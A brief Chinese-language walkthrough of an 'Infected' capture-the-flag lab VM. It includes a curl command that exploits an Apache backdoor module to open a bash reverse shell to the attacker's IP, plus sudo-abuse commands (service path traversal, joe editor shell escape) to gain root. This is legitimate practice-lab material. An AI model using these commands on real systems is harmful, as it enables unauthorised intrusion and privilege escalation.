# 靶场搭建
下载地址:Infected
导入,Nat 模式,直接开干
IP: 192.168.1.133
# 渗透过程
# 信息初收集
80 端口和 22
发现有 info.php
info.php 中发现加载了 mod_backdoor 模块,那就存在后门了,直接干
# 后门利用
网上搜这个模块,找到利用方式
反弹拿到 shell
┌──(root㉿kali)-[~] | |
└─# curl -H 'Backdoor: bash -c "bash -i >& /dev/tcp/192.168.1.129/4444 0>&1"' http://192.168.1.133 |
看到 sudo 可以 service
sudo -u laurent service ../../bin/sh | |
script /dev/null -c bash | |
^Z | |
stty raw -echo;fg | |
reset xterm | |
sudo joe | |
^K!/bin/sh |
拿到了 root 权限
# 小结
各种 sudo 的提权方式,有百科的情况下有些无聊了
